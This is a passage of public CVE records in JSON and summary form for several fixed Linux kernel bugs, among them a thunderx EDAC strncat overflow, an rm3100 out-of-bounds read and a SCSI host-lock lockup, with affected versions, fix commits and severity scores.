"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6aa7865ba7ff7f0ede0035180fb3b9400ceb405a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/700cf4bead80fac994dcc43ae1ca5d86d8959b21"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9dbac9fdae6e3b411fc4c3fca3bf48f70609c398"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e1c86511241588efffaa49556196f09a498d5057"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/426fae93c01dffa379225eb2bd4d3cdc42c6eec5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/475c58e1a471e9b873e3e39958c64a2d278275c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/edac/thunderx_edac.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "71c17ee02538802ceafc830f0736aa35b564e601",
"status": "affected",
"version": "41003396f932d7f027725c7acebb6a7caa41dc3e",
"versionType": "git"
},
{
"lessThan": "5da3b6e7196f0b4f3728e4e25eb20233a9ddfaf6",
"status": "affected",
"version": "41003396f932d7f027725c7acebb6a7caa41dc3e",
"versionType": "git"
},
{
"lessThan": "6aa7865ba7ff7f0ede0035180fb3b9400ceb405a",
"status": "affected",
"version": "41003396f932d7f027725c7acebb6a7caa41dc3e",
"versionType": "git"
},
{
"lessThan": "700cf4bead80fac994dcc43ae1ca5d86d8959b21",
"status": "affected",
"version": "41003396f932d7f027725c7acebb6a7caa41dc3e",
"versionType": "git"
},
{
"lessThan": "9dbac9fdae6e3b411fc4c3fca3bf48f70609c398",
"status": "affected",
"version": "41003396f932d7f027725c7acebb6a7caa41dc3e",
"versionType": "git"
},
{
"lessThan": "e1c86511241588efffaa49556196f09a498d5057",
"status": "affected",
"version": "41003396f932d7f027725c7acebb6a7caa41dc3e",
"versionType": "git"
},
{
"lessThan": "426fae93c01dffa379225eb2bd4d3cdc42c6eec5",
"status": "affected",
"version": "41003396f932d7f027725c7acebb6a7caa41dc3e",
"versionType": "git"
},
{
"lessThan": "475c58e1a471e9b873e3e39958c64a2d278275c8",
"status": "affected",
"version": "41003396f932d7f027725c7acebb6a7caa41dc3e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/edac/thunderx_edac.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.12"
},
{
"lessThan": "4.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nEDAC/thunderx: Fix possible out-of-bounds string access\n\nEnabling -Wstringop-overflow globally exposes a warning for a common bug\nin the usage of strncat():\n\n drivers/edac/thunderx_edac.c: In function \u0027thunderx_ocx_com_threaded_isr\u0027:\n drivers/edac/thunderx_edac.c:1136:17: error: \u0027strncat\u0027 specified bound 1024 equals destination size [-Werror=stringop-overflow=]\n 1136 | strncat(msg, other, OCX_MESSAGE_SIZE);\n | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n ...\n 1145 | strncat(msg, other, OCX_MESSAGE_SIZE);\n ...\n 1150 | strncat(msg, other, OCX_MESSAGE_SIZE);\n\n ...\n\nApparently the author of this driver expected strncat() to behave the\nway that strlcat() does, which uses the size of the destination buffer\nas its third argument rather than the length of the source buffer. The\nresult is that there is no check on the size of the allocated buffer.\n\nChange it to strlcat().\n\n [ bp: Trim compiler output, fixup commit message. ]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:16.530Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/71c17ee02538802ceafc830f0736aa35b564e601"
},
{
"url": "https://git.kernel.org/stable/c/5da3b6e7196f0b4f3728e4e25eb20233a9ddfaf6"
},
{
"url": "https://git.kernel.org/stable/c/6aa7865ba7ff7f0ede0035180fb3b9400ceb405a"
},
{
"url": "https://git.kernel.org/stable/c/700cf4bead80fac994dcc43ae1ca5d86d8959b21"
},
{
"url": "https://git.kernel.org/stable/c/9dbac9fdae6e3b411fc4c3fca3bf48f70609c398"
},
{
"url": "https://git.kernel.org/stable/c/e1c86511241588efffaa49556196f09a498d5057"
},
{
"url": "https://git.kernel.org/stable/c/426fae93c01dffa379225eb2bd4d3cdc42c6eec5"
},
{
"url": "https://git.kernel.org/stable/c/475c58e1a471e9b873e3e39958c64a2d278275c8"
}
],
"title": "EDAC/thunderx: Fix possible out-of-bounds string access",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52464",
"datePublished": "2024-02-23T14:46:24.150Z",
"dateReserved": "2024-02-20T12:30:33.296Z",
"dateUpdated": "2025-05-04T07:37:16.530Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26702 (GCVE-0-2024-26702)
Vulnerability from cvelistv5
Published
2024-04-03 14:55
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iio: magnetometer: rm3100: add boundary check for the value read from RM3100_REG_TMRC
Recently, we encounter kernel crash in function rm3100_common_probe
caused by out of bound access of array rm3100_samp_rates (because of
underlying hardware failures). Add boundary check to prevent out of
bound access.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 121354b2eceb2669ebdffa76b105ad6c03413966 Version: 121354b2eceb2669ebdffa76b105ad6c03413966 Version: 121354b2eceb2669ebdffa76b105ad6c03413966 Version: 121354b2eceb2669ebdffa76b105ad6c03413966 Version: 121354b2eceb2669ebdffa76b105ad6c03413966 Version: 121354b2eceb2669ebdffa76b105ad6c03413966 Version: 121354b2eceb2669ebdffa76b105ad6c03413966 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26702",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-04T15:20:17.184977Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125 Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-05T15:06:19.230Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.653Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7200170e88e3ec54d9e9c63f07514c3cead11481"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36a49290d7e6d554020057a409747a092b1d3b56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d5838a473e8e6d812257c69745f5920e4924a60"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/176256ff8abff29335ecff905a09fb49e8dcf513"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d8c67e94e9e977603473a543d4f322cf2c4aa01"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/57d05dbbcd0b3dc0c252103b43012eef5d6430d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/792595bab4925aa06532a14dd256db523eb4fa5e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iio/magnetometer/rm3100-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7200170e88e3ec54d9e9c63f07514c3cead11481",
"status": "affected",
"version": "121354b2eceb2669ebdffa76b105ad6c03413966",
"versionType": "git"
},
{
"lessThan": "36a49290d7e6d554020057a409747a092b1d3b56",
"status": "affected",
"version": "121354b2eceb2669ebdffa76b105ad6c03413966",
"versionType": "git"
},
{
"lessThan": "8d5838a473e8e6d812257c69745f5920e4924a60",
"status": "affected",
"version": "121354b2eceb2669ebdffa76b105ad6c03413966",
"versionType": "git"
},
{
"lessThan": "176256ff8abff29335ecff905a09fb49e8dcf513",
"status": "affected",
"version": "121354b2eceb2669ebdffa76b105ad6c03413966",
"versionType": "git"
},
{
"lessThan": "1d8c67e94e9e977603473a543d4f322cf2c4aa01",
"status": "affected",
"version": "121354b2eceb2669ebdffa76b105ad6c03413966",
"versionType": "git"
},
{
"lessThan": "57d05dbbcd0b3dc0c252103b43012eef5d6430d1",
"status": "affected",
"version": "121354b2eceb2669ebdffa76b105ad6c03413966",
"versionType": "git"
},
{
"lessThan": "792595bab4925aa06532a14dd256db523eb4fa5e",
"status": "affected",
"version": "121354b2eceb2669ebdffa76b105ad6c03413966",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iio/magnetometer/rm3100-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.0"
},
{
"lessThan": "5.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: magnetometer: rm3100: add boundary check for the value read from RM3100_REG_TMRC\n\nRecently, we encounter kernel crash in function rm3100_common_probe\ncaused by out of bound access of array rm3100_samp_rates (because of\nunderlying hardware failures). Add boundary check to prevent out of\nbound access."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:24.314Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7200170e88e3ec54d9e9c63f07514c3cead11481"
},
{
"url": "https://git.kernel.org/stable/c/36a49290d7e6d554020057a409747a092b1d3b56"
},
{
"url": "https://git.kernel.org/stable/c/8d5838a473e8e6d812257c69745f5920e4924a60"
},
{
"url": "https://git.kernel.org/stable/c/176256ff8abff29335ecff905a09fb49e8dcf513"
},
{
"url": "https://git.kernel.org/stable/c/1d8c67e94e9e977603473a543d4f322cf2c4aa01"
},
{
"url": "https://git.kernel.org/stable/c/57d05dbbcd0b3dc0c252103b43012eef5d6430d1"
},
{
"url": "https://git.kernel.org/stable/c/792595bab4925aa06532a14dd256db523eb4fa5e"
}
],
"title": "iio: magnetometer: rm3100: add boundary check for the value read from RM3100_REG_TMRC",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26702",
"datePublished": "2024-04-03T14:55:01.025Z",
"dateReserved": "2024-02-19T14:20:24.157Z",
"dateUpdated": "2025-05-04T08:54:24.314Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26627 (GCVE-0-2024-26627)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: core: Move scsi_host_busy() out of host lock for waking up EH handler
Inside scsi_eh_wakeup(), scsi_host_busy() is called & checked with host
lock every time for deciding if error handler kthread needs to be waken up.
This can be too heavy in case of recovery, such as:
- N hardware queues
- queue depth is M for each hardware queue
- each scsi_host_busy() iterates over (N * M) tag/requests
If recovery is triggered in case that all requests are in-flight, each
scsi_eh_wakeup() is strictly serialized, when scsi_eh_wakeup() is called
for the last in-flight request, scsi_host_busy() has been run for (N * M -
1) times, and request has been iterated for (N*M - 1) * (N * M) times.
If both N and M are big enough, hard lockup can be triggered on acquiring
host lock, and it is observed on mpi3mr(128 hw queues, queue depth 8169).
Fix the issue by calling scsi_host_busy() outside the host lock. We don't
need the host lock for getting busy count because host the lock never
covers that.
[mkp: Drop unnecessary 'busy' variables pointed out by Bart]
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6eb045e092efefafc6687409a6fa6d1dabf0fb69 Version: 6eb045e092efefafc6687409a6fa6d1dabf0fb69 Version: 6eb045e092efefafc6687409a6fa6d1dabf0fb69 Version: 6eb045e092efefafc6687409a6fa6d1dabf0fb69 Version: 6eb045e092efefafc6687409a6fa6d1dabf0fb69 Version: 6eb045e092efefafc6687409a6fa6d1dabf0fb69 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26627",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-23T15:54:15.450474Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-16T15:55:34.142Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.707Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f5944853f7a961fedc1227dc8f60393f8936d37c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d37c1c81419fdef66ebd0747cf76fb8b7d979059"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/db6338f45971b4285ea368432a84033690eaf53c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/65ead8468c21c2676d4d06f50b46beffdea69df1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07e3ca0f17f579491b5f54e9ed05173d6c1d6fcb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4373534a9850627a2695317944898eb1283a2db0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/scsi_error.c",
"drivers/scsi/scsi_lib.c",
"drivers/scsi/scsi_priv.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f5944853f7a961fedc1227dc8f60393f8936d37c",
"status": "affected",
"version": "6eb045e092efefafc6687409a6fa6d1dabf0fb69",
"versionType": "git"
},
{
"lessThan": "d37c1c81419fdef66ebd0747cf76fb8b7d979059",
"status": "affected",
"version": "6eb045e092efefafc6687409a6fa6d1dabf0fb69",
"versionType": "git"
},
{
"lessThan": "db6338f45971b4285ea368432a84033690eaf53c",
"status": "affected",
"version": "6eb045e092efefafc6687409a6fa6d1dabf0fb69",
"versionType": "git"
},
{
"lessThan": "65ead8468c21c2676d4d06f50b46beffdea69df1",
"status": "affected",
"version": "6eb045e092efefafc6687409a6fa6d1dabf0fb69",
"versionType": "git"
},
{
"lessThan": "07e3ca0f17f579491b5f54e9ed05173d6c1d6fcb",
"status": "affected",
"version": "6eb045e092efefafc6687409a6fa6d1dabf0fb69",
"versionType": "git"
},
{
"lessThan": "4373534a9850627a2695317944898eb1283a2db0",
"status": "affected",
"version": "6eb045e092efefafc6687409a6fa6d1dabf0fb69",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/scsi_error.c",
"drivers/scsi/scsi_lib.c",
"drivers/scsi/scsi_priv.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: core: Move scsi_host_busy() out of host lock for waking up EH handler\n\nInside scsi_eh_wakeup(), scsi_host_busy() is called \u0026 checked with host\nlock every time for deciding if error handler kthread needs to be waken up.\n\nThis can be too heavy in case of recovery, such as:\n\n - N hardware queues\n\n - queue depth is M for each hardware queue\n\n - each scsi_host_busy() iterates over (N * M) tag/requests\n\nIf recovery is triggered in case that all requests are in-flight, each\nscsi_eh_wakeup() is strictly serialized, when scsi_eh_wakeup() is called\nfor the last in-flight request, scsi_host_busy() has been run for (N * M -\n1) times, and request has been iterated for (N*M - 1) * (N * M) times.\n\nIf both N and M are big enough, hard lockup can be triggered on acquiring\nhost lock, and it is observed on mpi3mr(128 hw queues, queue depth 8169).\n\nFix the issue by calling scsi_host_busy() outside the host lock. We don\u0027t\nneed the host lock for getting busy count because host the lock never\ncovers that.\n\n[mkp: Drop unnecessary \u0027busy\u0027 variables pointed out by Bart]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:36.937Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f5944853f7a961fedc1227dc8f60393f8936d37c"
},
{
"url": "https://git.kernel.org/stable/c/d37c1c81419fdef66ebd0747cf76fb8b7d979059"
},
{
"url": "https://git.kernel.org/stable/c/db6338f45971b4285ea368432a84033690eaf53c"
},
{
"url": "https://git.kernel.org/stable/c/65ead8468c21c2676d4d06f50b46beffdea69df1"
},
{
"url": "https://git.kernel.org/stable/c/07e3ca0f17f579491b5f54e9ed05173d6c1d6fcb"
},
{
"url": "https://git.kernel.org/stable/c/4373534a9850627a2695317944898eb1283a2db0"
}
],
"title": "scsi: core: Move scsi_host_busy() out of host lock for waking up EH handler",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26627",
"datePublished": "2024-03-06T06:45:34.339Z",
"dateReserved": "2024-02-19T14:20:24.135Z",
"dateUpdated": "2025-05-04T08:52:36.937Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35958 (GCVE-0-2024-35958)
Vulnerability from cvelistv5
Published
2024-05-20 09:41
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ena: Fix incorrect descriptor free behavior
ENA has two types of TX queues:
- queues which only process TX packets arriving from the network stack
- queues which only process TX packets forwarded to it by XDP_REDIRECT
or XDP_TX instructions
The ena_free_tx_bufs() cycles through all descriptors in a TX queue
and unmaps + frees every descriptor that hasn't been acknowledged yet
by the device (uncompleted TX transactions).
The function assumes that the processed TX queue is necessarily from
the first category listed above and ends up using napi_consume_skb()
for descriptors belonging to an XDP specific queue.
This patch solves a bug in which, in case of a VF reset, the
descriptors aren't freed correctly, leading to crashes.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 548c4940b9f1f527f81509468dd60b61418880b6 Version: 548c4940b9f1f527f81509468dd60b61418880b6 Version: 548c4940b9f1f527f81509468dd60b61418880b6 Version: 548c4940b9f1f527f81509468dd60b61418880b6 Version: 548c4940b9f1f527f81509468dd60b61418880b6 Version: 548c4940b9f1f527f81509468dd60b61418880b6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35958",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-29T18:17:10.294133Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-31T20:13:03.442Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.187Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
